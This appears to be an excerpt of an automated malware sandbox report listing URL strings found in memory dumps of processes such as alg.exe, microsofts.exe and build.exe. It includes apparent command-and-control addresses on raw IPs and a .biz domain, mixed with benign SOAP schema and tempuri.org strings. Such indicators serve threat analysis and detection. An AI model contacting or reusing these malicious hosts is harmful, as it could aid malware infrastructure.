                        Source: microsofts.exe, 00000003.00000003.2152690816.0000000005252000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2140213694.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2141054500.000000000048F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2631632756.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2139729027.000000000048D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2651348452.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                        Source: alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/G
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/I
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181861289.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/O
                        Source: alg.exe, 00000005.00000003.2140213694.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/S
                        Source: alg.exe, 00000005.00000003.2549986437.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/_
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/bimwjsl
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/bimwjsl4
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqj
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqjgs
                        Source: alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqjkosw
                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eboqedbjpoqnvpqk
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2660006964.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2651348452.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2696891139.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2707287809.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eboqedbjpoqnvpqkK
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/exvjfnyxjxwq
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/exvjfnyxjxwqXwL
                        Source: alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/p
                        Source: alg.exe, 00000005.00000003.2173994587.000000000048A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173035402.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/pkljfdj
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3098884658.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3083445109.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rsstpsksfhdhf
                        Source: alg.exe, 00000005.00000003.2549986437.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/txk
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/txksfio
                        Source: alg.exe, 00000005.00000003.3240297723.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/biwgwfhxqj
                        Source: alg.exe, 00000005.00000003.2597665944.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2595969807.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/exvjfnyxjxwq
                        Source: microsofts.exe, 00000003.00000003.2153981776.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ltaudf
                        Source: alg.exe, 00000005.00000003.3037009789.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/rsstpsksfhdhf
                        Source: alg.exe, 00000005.00000003.2549193886.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/txk
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/nuqhvreyT
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/;
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/G
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/IP$L
                        Source: alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/_
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dh
                        Source: alg.exe, 00000005.00000003.2370882102.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dltqf
                        Source: alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dltqfings
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hIO
                        Source: alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/k
                        Source: alg.exe, 00000005.00000003.2421987511.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2330817097.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2372013511.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2372432615.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406458559.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2407212765.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420603880.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2387874066.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2251455515.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291072197.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2410749727.00000000004B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/oiarwfji
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                        Source: alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuiv0
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.000000000048A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuivi
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuiviFy
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dh
                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2370882102.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dltqf
                        Source: alg.exe, 00000005.00000003.2251455515.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/oiarwfji
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/tookpqdumsvuivi
                        Source: alg.exe, 00000005.00000003.2847122391.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/lscqqdljnyP
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://saytjshyf.biz/
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Ent
                        Source: build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
